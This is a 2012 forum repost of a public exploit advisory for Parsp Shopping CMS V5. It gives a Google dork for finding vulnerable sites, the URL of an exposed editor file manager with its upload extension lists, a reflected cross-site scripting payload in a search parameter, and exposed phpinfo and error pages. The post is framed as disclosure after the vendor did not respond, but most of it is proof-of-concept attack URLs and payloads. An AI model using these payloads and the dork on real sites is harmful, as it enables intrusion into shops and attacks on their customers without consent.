The_Arhitect Posted January 23, 2012 Report Posted January 23, 2012 (edited) Parsp Shopping CMS [V5] Multiple Vulnerability# Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability# Date: 2012-01-22 [GMT +7]# Author: BHG Security Center# Software Link: http://www.parsp.com/# Vendor Response(s): They didn't respond to the emails.# Dork: intext:"powered by www.parsp.com V5"# Version : [5]# Tested on: ubuntu 11.04# CVE : -# Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - NoL1m1t (nol1m1t [at] rocketmail [dot] com)-----------------------------------------------------------------------------------------Parsp Shopping CMS [V4] Multiple Vulnerability-----------------------------------------------------------------------------------------Author : BHG Security CenterDate : 2012-01-22Location : IranWeb : http://Black-Hg.OrgCritical Lvl : MediumWhere : From RemoteMy Group : Black Hat Group #BHG---------------------------------------------------------------------------PoC/Exploit:~~~~~~~~~~------------- ( WYSIWYG Editor ) ~ ~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php Allowed formats for uploading ~ $Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" ); $Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" ); $Config['AllowedExtensions']['Flash'] = array( "swf", "fla" ); $Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" ); Unauthorized extension $Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" );------------- ( Cross Site Scripting ) ~ ~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad='-------------( Error message on page For Find Directory Address ) ~ ~ [PoC]Http://[victim]/path/printable.phpNote:User and account information on the site intended for attacks burteforce-------------( PHPinfo page Information ) ~ ~ [PoC]Http://[victim]/path/phpinfo.phpNote:Full information about the Php installed on the server Timeline:~~~~~~~~~- 21 - 01 - 2012 bug found.- 21 - 01 - 2012 vendor contacted, but no response.- 22 - 01 - 2012 Advisories release. Important Notes:~~~~~~~~~- Vendor did not respond to the email as well as the phone. As thereis not any contact form or email address in- the website, we have used all the emails which had been found bysearching in Google such as support, info, and so on.---------------------------------------------------------------------------Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3RallSpical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz[!] Persian Gulf 4 Ever[!] I Love Iran And All Iranian PeopleGreetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ-------------------------------- [ EOF ] ----------------------------------Sursa: Parsp Shopping CMS [V5] Multiple Vulnerability Edited January 23, 2012 by The_Arhitect Quote
